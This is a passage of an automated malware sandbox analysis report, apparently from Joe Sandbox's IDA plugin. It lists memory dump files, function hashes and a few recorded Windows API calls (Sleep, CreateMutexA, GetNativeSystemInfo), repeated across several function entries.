Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: baa3c1cad39eb894f50c67f2c888be5b5584fce559f71b69d07aad35ad94cf39
Instruction ID: 65067c6f29a8fc3dff32f5982dcc09302817963637e6b93c4bdd408c822f9bbd
Opcode Fuzzy Hash: baa3c1cad39eb894f50c67f2c888be5b5584fce559f71b69d07aad35ad94cf39
Instruction Fuzzy Hash: 47318A316841008BFB08DBB8EDD97ADB766EFC1318F24C21AF014A73D1C77999908752

Function 009DA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: cce53f3c0619a7ba00a4d75a029dcfa0db27f238c1378256c95a8cc13496cb78
Instruction ID: 12f698f67baa9286a18fb3763ceb5bdc4fa5d0f9e032abe0dd26972fef1a59ba
Opcode Fuzzy Hash: cce53f3c0619a7ba00a4d75a029dcfa0db27f238c1378256c95a8cc13496cb78
Instruction Fuzzy Hash: 59314831A842409BFB08DBB8DDD97AEB7A6EFC1314F24C61AE014A73E1C77599908752

Function 009D9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 600d1fa925dfa359f723965b5c351185fd6e3e2fdc7e93b4c934f58811e073d2
Instruction ID: 7ba804c80c2eb451d3d295501a03e0e0538774c544643ea285cd241d2dc42ba8
Opcode Fuzzy Hash: 600d1fa925dfa359f723965b5c351185fd6e3e2fdc7e93b4c934f58811e073d2
Instruction Fuzzy Hash: 812179326842009BFB18ABACECD57ADF365EBD1314F20822AF418973D1CB79A9908651

Function 009DA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 79de94d3c479bb863a4309d42aa931213c5700ad4a30b3dfee294e5875d72edb
Instruction ID: 1d8d4bb54775bb7ac1af5bfa883183bc7048129f6cb9e0d37a23b2faa2cfc19d
Opcode Fuzzy Hash: 79de94d3c479bb863a4309d42aa931213c5700ad4a30b3dfee294e5875d72edb
Instruction Fuzzy Hash: A9216D312C92019AFB2467EC9C9677EF2569FC1300F20C927F944963D1DB7A999191A3

Function 009DA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 009DA963
CreateMutexA.KERNEL32(00000000,00000000,00A33254), ref: 009DA981

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502874502.0000000000CDC000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e4c0a6243c104750ac9d9a2e9fc93434cf9a07814cd7e13fb45daa233c482291
Instruction ID: 5fff547e6472848a660d02b82ed4a966fdeef13b9080fca53a91cc7c73eb15a1
Opcode Fuzzy Hash: e4c0a6243c104750ac9d9a2e9fc93434cf9a07814cd7e13fb45daa233c482291
Instruction Fuzzy Hash: 7E2179322842009BFB089BACED957ADF766DBD1314F24862AF404973D0CB76AA908752

Function 009D7D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009D7ED3

Memory Dump Source

Source File: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000000.00000002.1500480259.00000000009D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500511815.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500659213.0000000000A39000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500687430.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500726258.0000000000A47000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500891075.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500915698.0000000000B9A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501004768.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501066842.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501144972.0000000000BCD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501210639.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501428806.0000000000BD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501486929.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501540402.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501574483.0000000000BD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501601175.0000000000BE8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501625448.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501648028.0000000000BEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501680045.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501774470.0000000000C14000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501837464.0000000000C16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501872527.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501894888.0000000000C1D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501915726.0000000000C25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501934815.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501956272.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1501984908.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502013431.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502161685.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502259261.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502343404.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502404048.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502546966.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502584482.0000000000C58000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502606825.0000000000C99000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502687085.0000000000CAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502712588.0000000000CAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502738869.0000000000CC3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502765788.0000000000CC4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502793193.0000000000CC5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502817052.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502841415.0000000000CDB000.00000040.00000001.01000000.00000003.sdmpDownload File
